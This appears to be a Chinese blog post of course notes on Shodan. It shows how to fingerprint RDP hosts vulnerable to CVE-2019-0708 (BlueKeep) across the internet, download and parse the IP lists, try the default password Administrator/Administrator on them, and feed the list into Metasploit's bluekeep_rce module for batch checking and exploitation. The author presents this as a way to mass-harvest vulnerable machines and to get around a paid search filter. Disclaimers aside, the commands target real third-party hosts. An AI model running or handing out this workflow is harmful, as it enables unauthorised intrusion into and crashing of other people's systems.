shodan 【2】(泷羽sec)

声明

学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权马上删除文章。

笔记只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负

这节课旨在扩大自己在网络安全方面的知识面,了解网络安全领域的见闻,了解学习哪些知识对于我们渗透测试有帮助,避免盲目地学习降低效率。


前言

shodan的指令语法很多,不可能说每个参数都讲完,因为有的参数压根用不上。

今天把一些红队常用的参数讲完,以cve-2019-0708的一个漏洞为例

cve-2019-0708

漏洞介绍

通过利用远程桌面的3389端口,RDP协议进行攻击,从而导致机器蓝屏瘫痪。该漏洞的触发无需任何用户交互操作,这就意味着,存在漏洞的计算机只要联网,无需任何操作,就有可能遭遇黑客远程攻击,运行恶意代码等,极具破坏性!

漏洞原理

存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行

复制代码
shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

#十六进制字符串(类似于指纹的方式去找)

'"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

上面这串字符串就是cve-2019-0708的十六进制漏洞特征,但是有漏洞不代表能直接利用

用Windows远程连接 看主机是否存活,IP已打码

远程连接出现后,可以测试弱口令 Administrator &Administrator

如果无法连接也没事,我们可以使用metasploit去进行批量的漏洞利用,msfconsole,讲到那学到哪,不用着急,工具也俗称msf

将命令输出的IP信息,复制到一个新建文本,只有IP,不要带端口,命名为01.txt,将其复制到kali

复制代码
msfconsole
#进入msf


search 01


use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

#进入利用脚本


show options


set rhosts file:(拖入复制的文本,比如文本从物理机桌面粘贴到kali桌面,在kali桌面点击拖住,移动到这条命令里)


check(开始检测)

#显示出来,有*的为利用不成功

攻击不成功有几点说一下,首先 show options 看清我们的payload ,IP端口要填对,另外就是show targets 它支持Windows7,sever这种,得把targets设置正确

这样找漏洞会方便很多

今天讲两个参数一个parse一个download

download(下载)

shodan download -h(查看帮助文档)

复制代码
shodan download 0001 --limit 100 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

#下载有关cve-2019-0708漏洞的100条,'0001'仅为保存的文件名,可随意设置

#输入命令时,显示你在哪个目录,就去哪个目录去找"0001",输出格式为 '0001.json.gz'

如何打开 .json.gz这个输出文件呢,看下条参数

parse(可理解为解压)

shodan parse -h(查看帮助文档)

复制代码
shodan parse --fields ip_str 0001.json.gz

#直接在终端打开

或

shodan parse --fields ip_str 0001.json.gz >0001.txt

#将'0001.json.gz'输出为'0001.txt'

这是一个批量刷漏洞的一个姿势

当然,也可以用 这条命令:shodan search vuln:cve-2019-0708 ,但是这需要更高级别的账号去使用,我们用这种方式照样绕过它去批漏洞

遵纪守法,从我做起

相关推荐
网安INF3 小时前
ElGamal加密算法:离散对数难题的安全基石
java·网络安全·密码学
DevSecOps选型指南9 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
ABB自动化9 小时前
for AC500 PLCs 3ADR025003M9903的安全说明
服务器·安全·机器人
恰薯条的屑海鸥9 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
阿部多瑞 ABU10 小时前
主流大语言模型安全性测试(三):阿拉伯语越狱提示词下的表现与分析
人工智能·安全·ai·语言模型·安全性测试
网安INF11 小时前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
lubiii_11 小时前
墨者学院-密码学实训隐写术第二题
web安全·网络安全·密码学
moongoblin12 小时前
行业赋能篇-2-能源行业安全运维升级
运维·安全·协作
Fortinet_CHINA13 小时前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
网络·安全
这儿有一堆花14 小时前
安全访问家中 Linux 服务器的远程方案 —— 专为单用户场景设计
linux·服务器·安全